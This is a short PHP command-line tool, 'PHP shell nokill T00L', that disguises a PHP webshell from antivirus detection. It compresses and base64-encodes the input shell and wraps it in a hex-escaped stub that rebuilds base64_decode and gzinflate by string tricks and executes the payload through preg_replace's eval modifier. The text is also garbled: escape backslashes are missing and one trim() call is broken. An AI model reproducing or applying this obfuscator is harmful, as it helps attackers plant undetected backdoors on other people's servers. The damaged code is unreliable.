-
- /*
- Title: PHP shell nokill T00L
- Blog: exploit-db.blogcn.com
- */
- error_reporting(0);
- @ini_set('memory_limit','-1');
- set_time_limit(0);
- $toolname="$argv[0]";
- if ($argc<2) {
- baner($toolname);
- die;
- }
- $input_file= trim($argv[1]);
- $output_file='nokill_'.$input_file;
- if (file_exists($input_file)) {
- No_kill_c0de($input_file,$output_file);
- echo "PHP shell nokill T00Lrn";
- echo "Blog: exploit-db.blogcn.comrn";
- echo "Input: {$input_file}rn";
- $file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
- echo "[ ] Generate success!rn";
- echo "Saved to {$file_full_path}"."rn";
- } else {
- echo "PHP shell nokill T00Lrn";
- echo "Blog: exploit-db.blogcn.comrn";
- die("[-] Failed ! The File $input_file does not exist");
- }
- function No_kill_c0de($input_file,$output_file){
- $no_whitespace=php_strip_whitespace($input_file);
- $no_php_tag=trim(trim(trim($no_whitespace,'');
- $enfile=base64_encode(gzdeflate($no_php_tag));
- $shellcode="x3cx3fx70x68x70xdxa";
- $shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa";
- $shellcode.="x24x62x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x66x27x2cx22x22x2cx22x62x66x61x66x73x66x65x66x36x66x34x66x5fx66x66x64x66x66x65x66x66x63x66x66x6fx66x66x64x66x66x65x66x22x29x3bxdxax24x67x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x58x27x2cx27x27x2cx27x67x58x58x7ax58x58x69x58x58x6ex58x58x58x58x66x58x58x58x6cx58x58x61x58x58x58x74x58x58x58x58x58x65x27x29x3bxdxax70x72x65x67x5fx72x65x70x6cx61x63x65x28x27x5cx27x61x5cx27x65x69x73x27x2cx27x65x27x2ex27x76x27x2ex27x61x27x2ex27x6cx27x2ex27x28x24x67x28x24x62x28x24x65x6ex66x69x6cx65x29x29x29x27x2cx27x61x27x29x3bxdxa";
- $shellcode.="x3fx3e";
- file_put_contents("$output_file",$shellcode);
- }
- function baner($toolname){
- echo "PHP shell nokill T00Lrn";
- echo "Blog: exploit-db.blogcn.comrn";
- echo "Usage: {$toolname} phpwebshellrn";
- }
- ?>
|
